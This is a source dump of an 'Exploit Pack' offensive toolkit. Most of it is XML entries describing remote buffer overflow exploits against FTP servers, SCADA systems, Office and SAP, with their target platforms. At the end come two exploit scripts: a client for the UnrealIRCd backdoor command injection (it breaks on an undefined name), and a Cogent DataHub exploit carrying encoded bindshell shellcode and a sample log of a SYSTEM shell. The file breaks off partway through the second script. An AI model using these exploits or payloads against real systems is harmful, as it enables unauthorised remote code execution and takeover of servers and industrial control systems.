10 | arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
11 |
12 |
13 |
14 | Apache/2.0.58 (Win32) mod_jk/1.2.19 - Apache/2.0.59 (Win32) mod_jk/1.2.19
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/AudioTran-PLS.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow Stack Overflow / SEH
9 | ToDo: Add Lib Shell
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Avaya-winpdm.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A boundary error in the Unite Host Router service (UniteHostRouter.exe)
9 | when processing certain requests can be exploited to cause a stack-based buffer
10 | overflow via an overly long string in the "To:" field sent to UDP port 3217.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Aviosoft-Digital.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Aviosoft 1.x Win 7 and XP SP2/SP3 English Buffer Overflow Stack Overflow
9 | ToDo: Add Remote
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Avira-Guard.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Avira AntiVir personal edition avguard.exe 7.00.00.52 is prone to a local heap overflow because it fails to perform adequate boundary-checks.
9 | Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/BIG-Ant-Server-XPLT.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | BigAnt Server version 2.50 SEH Overwrite - 0day remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/BIG-Ant-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | BigAnt Server 2.52 remote buffer overflow exploit suffer because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bison-FTP-Server-MKD.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | BisonFTP Server v3.5 (MKD) Remote Buffer Overflow Exploit. Newer versions not tested, maybe vulnerable too.
10 | This FTP Server is prone to a remote buffer overflow attack.
11 | Impact : Remote Buffer Overflow ( in MKD command)
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bison-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | BisonFTP Server v3.5 Remote Buffer Overflow Exploit. Newer versions not tested, maybe vulnerable too.
10 | ToDo: Add execute shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Bopup-Com-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH) fails to perform adequate boundary-checks.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/CA-ArcServe.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | CA ArcServe is prone to a remote buffer overflow because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Cerberus-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Cerberus FTP Server 4.0.9.8 (REST) Remote Buffer Overflow Exploit. Newer versions not tested, maybe vulnerable too.
10 | ToDo: Add remote shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/CoDeSyS-SCADA-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | CoDeSyS SCADA Exploit. Vulnerability occurs while parsing long HTTP requests in webserver.
9 |
10 |
11 |
12 | Microsoft Windows SP0/SP1 En
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Cogent-Datahub.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Cogent Datahub v7.1.1.63 Remote Unicode Buffer Overflow Exploit
9 | ToDo: Add remote shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Windows XP SP2 , SP3 - Cogent Datahub v7.1.1.63
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Core-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked,
9 | resulting in control of the instruction pointer, allowing for arbitrary code injection.
10 |
11 |
12 |
13 | Microsoft Windows XP SP3 - SP2 - SP1
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Denial-Of-Service.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | This Denial Of Service tool uses raw IP packets in no-novel ways to try stress the web target hosts childs
9 | It was designed to rapidly scan create 48 connections and it works fine against single hosts
10 | Requires 2MB ADSL/Cable bandwidth in order to work properly
11 |
12 |
13 |
14 | Targets tested vulnerables Apache 2.x default config
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Disk-Pulse-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A vulnerability exists in the way Disk Pulse Server v2.2.34 process a remote clients "GetServerInfo" request.
9 | The vulnerability is caused due to a boundary error in libpal.dll when handling network messages and can be exploited
10 | to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 9120.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/EChat-Server-v2.5.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Easy-FTP-Server-1.7.11.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Easy FTP Server USER Command Remote Buffer Overflow Exploit
10 | when parsing the command 'USR', which leads to a stack based overflow. Easy FTP Server allows remote anonymous login by default;
11 | exploiting these issues could allow an attacker to compromise the application and access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Example.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Exploit information example
9 |
10 |
11 |
12 | Vulnerable targets
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/FTP-Getter.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a response to the PASV command. Fortunately, these errors lead to buffer overflows.
9 | This exploit is unstable. It should only be used as a POC. Tested several times on various systems, the buffer sometimes changed.
10 |
11 |
12 |
13 | Windows XP SP2 , SP3
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-ACCL.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit
9 | ToDo: Add execute shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-REST.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit
9 | ToDo: Add remote shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Free-Float-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Free Float FTP Server USER Command Remote Buffer Overflow Exploit
9 | when parsing the command 'USR', which leads to a stack based overflow. Also Free Float FTP Server allow remote anonymous login by default
10 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
11 |
12 |
13 |
14 | Microsoft Windows XP SP2 - Microsoft Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/GOM-Player.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows.
9 | This exploit is unstable. It should only be used as a POC. Once the list is imported the player will execute the BoF
10 |
11 |
12 |
13 | Windows XP SP2 , SP3
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/IBM-Tivoli-Storage.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A vulnerability exists in the way IBM Tivoli Storage Manager Express 5.3 CAD Service Buffer Overflow process a clients request.
9 | The vulnerability is caused due to a boundary error in when handling network messages and can be exploited
10 | to cause a stack-based buffer overflow via a specially crafted packet sent to TCP port 1581.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - Win2k
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/KingView-Scada.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in KingView 6.5.3 SCADA HMI allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/KnFTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | This exploit overwrite EIP and SEH is overwritten with larger payloads knftpd.exe is the only non safeseh module
10 | ToDo: Add remote shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Kolibri-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Kolibri v2.0 is vulnerable to a remote buffer overflow attack. By sending a malformed HEAD request,
9 | we are able to overwrite both the return address and an SEH handler. Null bytes terminate the request though,
10 | but we are able to partially overwrite with a pointer to a POP + POP + RET instruction inside kolibri.exe and gain control.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/LDAP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
9 | ToDo: Add execute shell
10 | ToDo: Test vulnerable targets
11 |
12 |
13 |
14 | Linux Ubuntu 8.10
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/LDAP-Vault.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | There was an error when sending a long value on SidVault 2.0e; these errors lead to a buffer overflow.
9 | This exploit is unstable. It should only be used as a POC.
10 | Remote shell is available but the system will be unstable.
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Excel-Record.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Microsoft Excel is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This version add support for Microsoft Office 2007 SP2.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, Microsoft Office 2003 - 2007
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Visio.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Drawing Exchange Format (DXF) is a kind of data file format for CAD which is designed by Autodesk for cooperation between Autocad and other software.
9 | Various software products support DXF files, and Microsoft Visio is one of them.
10 | A DXF file contains several sections, each of which contains records.
11 |
12 |
13 |
14 | Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Microsoft-Word-Record.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Microsoft Word is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This update adds support for Office 2003 SP0.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, Microsoft Office 2003
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Quick-Player.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Quick Player is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code in the context
9 | of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions.
10 | This version affects Quick Player 2.3.x
11 |
12 |
13 |
14 | Windows XP SP2, SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Remote-Scanner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Port Scanner uses raw IP packets in novel ways to determine what hosts are available on the network
9 | It was designed to rapidly scan large networks, but works fine against single hosts
10 | Required argument "Target Host" or IP address.
11 |
12 |
13 |
14 | Vulnerable targets
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/SAP-Server-MaxDB.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Sap Server 7.7.06.09 is vulnerable to a remote buffer overflow attack. This vulnerability allows remote attackers to execute arbitrary
9 | code on vulnerable installations of SAP MaxDB. Authentication is not required to exploit this vulnerability.
10 | The specific flaw exists within the serv.exe process which listens by default on TCP port 7210.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/SDP-Downloader.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | SDP Download from http://sdp.ppona.com/ suffer a Remote Buffer Overflow
10 | because it fails while receiving Content-Type: video with a long name; this issue will allow an attacker to execute arbitrary code.
11 | Failed exploit attempts will result in a denial-of-service condition.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Savant-Web-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Savant Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Script-FTP-3.3.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | ScriptFTP 3.3 Remote Buffer Overflow (LIST)
10 | ToDo: Add code execution shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Simple-HTTPD.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | Remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
10 | ToDo: Add execute shell
11 | ToDo: Test vulnerable targets
12 |
13 |
14 |
15 | Not tested Yet - Linux 2.6.18-ubi-sys-V2.0.17
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Solar-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in Solar FTP 2.1.1 PASV for Windows allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Sysax-multi.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | A boundary error in the SYSAX multi server 5.50 Create Folder Buffer Overflow
9 | Date Discovered: January 13, 2012
10 | Vendor Response: January 16, 2012
11 | Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
12 |
13 |
14 |
15 | Windows 7, XP SP2 , SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/TFTP-Server-1.4ST.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in TFTP Server SP 1.4 for Windows allow remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/UPlus-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | UPlus FTP server 1.7 is prone to a buffer overflow that allows remote attackers to cause a DoS or
9 | execute arbitrary code via a long username or password in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Verm-FTP-Daemon.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-Based buffer overflow in Vermillion FTP Daemon 1.31 for Windows allows remote attackers to cause a DoS or
9 | execute arbitrary code via a long filename in a read or write request. The vulnerability is caused due to a boundary error
10 | in the handling of filenames and can be exploited to cause a stack-based buffer overflow.
11 |
12 |
13 |
14 | Windows 7, XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Windows-Movie-Maker.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | The vulnerable part starts at “IsValidWMToolsStream” function. In this function new is used two times for allocating space.
9 | In both cases, values of Size needed for allocating memory is read from .mswmm file.
10 | Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions or execute arbitrary code.
11 |
12 |
13 |
14 | Windows XP SP2,SP3 Windows Movie Maker 2.1, Windows Vista SP1,SP2 and x64 versions, Windows Movie Maker 2.6, Windows Movie Maker 6.0, Windows Movie Maker 6.1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/XM-Personal-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | XM FTP Server Command Remote Buffer Overflow Exploit
10 | when parsing the command 'USR/PASS', which leads to a stack based overflow. FTP Server allow remote anonymous login by default
11 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/XlightFTP-Server-v3.7.0.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | XlightFTP Server v3.7.0 Remote Root BOF Exploit
10 | when parsing the command connect, leads to a stack based overflow. Xlight FTP Server 3.7.0 allow remote anonymous login by default
11 | exploiting these issues could allow an attacker to compromise the application, access or modify data.
12 |
13 |
14 |
15 | Microsoft Windows XP SP3 (Fr)
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/YourPersonalWebServer.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
9 | ToDo: Add Reverse
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Linux Ubuntu 6.06
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/ABunreal.py:
--------------------------------------------------------------------------------
1 |
2 | #It seems as if our backdoor was found so we figured we cant sell this in the ac1db1tch3z
3 | #CANVAS pack (PhosphoricAc1d Exploit pack).
4 |
5 | #P.S. Since it took months and months for the community to find the system() exploit,
6 | #we still have a more complicated zerday unrealircd hack module. Please inquire
7 | #when our website is finished.
8 |
9 | #Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,
10 | #and still owning everyone with it. Thanks.
11 | #------------------------------------------------------------------------
12 |
13 | #$ stat ABunreal.py
14 | # File: `ABunreal.py'
15 | # Size: 830 Blocks: 8 IO Block: 4096 regular file
16 | #Device: fd02h/64770d Inode: 16891994 Links: 1
17 | #Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)
18 | #Access: 2010-04-05 14:26:14.000000000 -0400
19 | #Modify: 2009-11-10 00:04:33.000000000 -0500
20 | #Change: 2010-04-05 14:26:59.000000000 -0400
21 |
22 | #------------------------------------------------------------------------
23 |
24 | #!/usr/bin/env python
25 | # Ac1db1tch3z 09
26 |
27 | import sys
28 | import socket
29 | import struct
30 |
def injectcode(host, port, command):
    """Open a TCP connection to host:port, send one line and print the reply.

    Args:
        host: target host name or address, passed straight to socket.connect.
        port: port number; converted with int().
        command: accepted but never used -- the local ``cmd`` below is
            assigned independently and the argument is discarded.

    Returns:
        0 when the connect fails; None otherwise.
    """
    host1 = host
    port1 = int(port)
    # NOTE(review): ``calc`` is not defined anywhere in this file (the module
    # imports only sys, socket and struct), so this line raises NameError
    # before any network traffic is sent. Left as-is.
    cmd = calc.exe

    print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"
    print "- Attacking %s on port %d"%(host1,port1)
    print "- sending command: %s"%cmd

    # Single semicolon-delimited line, newline-terminated.
    packet = "AB" +";"+ cmd + ";"+"\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host1, port1))
    except socket.error:
        print "No connection..."
        return 0
    s.sendall(packet)
    # One read of at most 5000 bytes; no timeout is set on the socket, so
    # this blocks until the peer sends something or closes.
    blah = s.recv(5000)
    print blah
    s.close()
53 |
if __name__ == "__main__":
    # Expected arguments: argv[1] = host, argv[2] = port. With no arguments
    # the usage text is printed and the process exits with status 1.
    if len(sys.argv) == 1:
        print "Usage:", sys.argv[0], " "
        print
        print "Modified for winAUTOPWN by QUAKERDOOMER"
        print
        sys.exit(1)
    else:
        print "Type quit to EXIT the shell\n"
        # NOTE(review): sys.argv[2] is a str; under CPython 2 (this file uses
        # print statements and raw_input) a str compares greater than any
        # int, so the condition is always true and the loop only ends via the
        # "quit" branch below or an exception. With exactly one argument,
        # sys.argv[2] raises IndexError here.
        while sys.argv[2] >= 1:
            cmd = raw_input("CMD:$Sa$ => ")
            if cmd == "quit":
                sys.exit(0)
            injectcode(sys.argv[1],sys.argv[2],cmd)
68 |
69 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/code/Cogent-datahub.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | #
3 | # Cogent Datahub <= v7.1.1.63 Remote Unicode Buffer Overflow Exploit
4 | # tested on:
5 | # - windows server 2003
6 | # - windows XP sp3
7 | # questions >> @net__ninja || @luigi_auriemma
8 | # example usage:
9 | # [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
10 | #
11 | # -----------------------------------------------------
12 | # ------ Cogent Datahub Unicode Overflow Exploit ------
13 | # ------------- Found by Luigi Auriemma ---------------
14 | # --------- SYSTEM exploit by Steven Seeley -----------
15 | #
16 | # (+) Sending overflow...
17 | # (+) Getting shell..
18 | # Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
19 | # Microsoft Windows [Version 5.2.3790]
20 | # (C) Copyright 1985-2003 Microsoft Corp.
21 | #
22 | # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
23 | # whoami
24 | # nt authority\system
25 | #
26 | # C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>
27 |
28 | import socket,time,sys,os
29 |
30 | # bindshell on port 1337
31 | shellcodez = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
32 | "IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
33 | "111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
34 | "2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
35 | "04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
36 | "PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
37 | "M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
38 | "XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
39 | "6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
40 | "8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
41 | "PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
42 | "0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
43 | "XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
44 | "8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
45 | "O8VKO8PKZA")
46 |
47 | align= ""
48 | align += "\x54" # push esp
49 | align += "\x6f"
50 | align += "\x58" # pop eax
51 | align += "\x6f"
52 | align += "\x05\x6f\x11" # add eax,11006f00
53 | align += "\x6f"
54 | align += "\x2d\x37\x01" # sub eax,01003700
55 | align += "\x6f"
56 | align += "\x2d\x37\x10" # sub eax,11003700
57 | align += "\x6f"
58 | align += "\x50" # push eax
59 | align += "\x6f"
60 | align += "\x48" # dec eax
61 | align += "\x6f"
62 | align += "\x48" # dec eax
63 | align += "\x6f"
64 | align += "\x55" # push ebp
65 | align += "\x6f"
